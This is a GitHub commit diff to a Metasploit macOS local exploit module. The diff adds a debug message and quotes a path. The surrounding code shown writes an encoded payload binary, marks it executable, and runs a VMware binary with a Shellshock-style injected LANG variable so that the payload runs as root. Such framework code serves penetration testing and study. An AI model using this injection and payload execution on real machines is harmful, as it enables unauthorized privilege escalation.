We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 6fb587e commit 8cb4ed4Copy full SHA for 8cb4ed4
modules/exploits/osx/local/vmware_bash_function_root.rb
@@ -72,10 +72,11 @@ def exploit
72
exe = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
73
write_file(payload_file, exe)
74
register_file_for_cleanup(payload_file)
75
+ print_status("Got here")
76
cmd_exec("chmod +x #{payload_file}")
77
78
print_status("Running VMWare services...")
- cmd_exec("LANG='() { :;}; #{payload_file}' #{datastore['VMWARE_PATH']}#{path} /dev/random")
79
+ cmd_exec("LANG='() { :;}; #{payload_file}' '#{datastore['VMWARE_PATH']}#{path}' /dev/random")
80
end
81
82
0 commit comments